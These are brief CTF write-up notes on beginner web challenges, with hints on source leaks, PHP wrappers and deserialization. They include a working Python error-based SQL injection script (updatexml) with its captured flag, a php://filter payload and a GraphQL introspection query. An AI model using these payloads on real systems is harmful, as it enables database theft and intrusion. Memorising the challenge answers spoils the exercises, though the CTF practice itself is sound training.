WEEK1-WEEK2
HTTP
GET/POST/Cookie
Head?Header!
User-Agent Referer
我真的会谢
.index.php.swp
www.zip
robots.txt
Word-For-You
1' or '1'='1
NotPHP
伪协议 弱比较 命令执行
Word-For-You 2
提示调试代码,尝试报错注入
import requests
url = 'http://39d8595b-85c2-4178-8a92-7968924a9dd5.node4.buuoj.cn:81/comments.php'
# payload = f'-- select group_concat(schema_name) from information_schema.schemata'
# payload = 'select group_concat(table_name) from information_schema.tables where table_schema="wfy"'
#~wfy_admin,wfy_comments,wfy_information'
# payload = 'select group_concat(column_name) from information_schema.columns where table_schema=\'wfy\' and table_name=\'wfy_comments\''
# ~id,text,user,name,display
payload = 'select (group_concat(0x7e,text)) from wfy.wfy_comments'
# ~flag{Ju4t_m2ke_some_err0rs}
data = {
# 'name': f'\'or/**/updatexml(1,concat(0x7e,({payload})),1)/**/or/**/\''
# 'name': f'\'or/**/updatexml(1,right(concat(0x7e,({payload})),16),1)/**/or/**/\''
'name': f'\'or/**/updatexml(1,right(concat(0x7e,({payload})),32),1)/**/or/**/\''
}
response = requests.post(url=url, data=data)
print(response.text)
UnserializeOne
入门的反序列化
IncludeOne
PHP伪随机数以伪协议利用
php://filter/read=string.rot13|NewStar|/resource=flag.php
ezAPI
没玩过
查询
{"query":"\n query IntrospectionQuery {\r\n __schema {\r\n
queryType { name }\r\n mutationType { name }\r\n subscriptionType {
name }\r\n types {\r\n ...FullType\r\n }\r\n
directives {\r\n name\r\n description\r\n
locations\r\n args {\r\n ...InputValue\r\n }\r\n
}\r\n }\r\n }\r\n\r\n fragment FullType on __Type {\r\n
kind\r\n name\r\n description\r\n fields(includeDeprecated: true)
{\r\n name\r\n description\r\n args {\r\n
...InputValue\r\n }\r\n type {\r\n ...TypeRef\r\n
}\r\n isDeprecated\r\n deprecationReason\r\n }\r\n
inputFields {\r\n ...InputValue\r\n }\r\n interfaces {\r\n
...TypeRef\r\n }\r\n enumValues(includeDeprecated: true) {\r\n
name\r\n description\r\n isDeprecated\r\n
deprecationReason\r\n }\r\n possibleTypes {\r\n ...TypeRef\r\n
}\r\n }\r\n\r\n fragment InputValue on __InputValue {\r\n name\r\n
description\r\n type { ...TypeRef }\r\n defaultValue\r\n
}\r\n\r\n fragment TypeRef on __Type {\r\n kind\r\n name\r\n
ofType {\r\n kind\r\n name\r\n ofType {\r\n
kind\r\n name\r\n ofType {\r\n kind\r\n
name\r\n ofType {\r\n kind\r\n name\r\n
ofType {\r\n kind\r\n name\r\n
ofType {\r\n kind\r\n name\r\n
ofType {\r\n kind\r\n name\r\n
}\r\n }\r\n }\r\n }\r\n
}\r\n }\r\n }\r\n }\r\n ","variables":null}
flag
payload:id=1&data={"query":"query{\nffffllllaaagggg_1n_h3r3_flag {\nflag\n}\n}\n"}
Last updated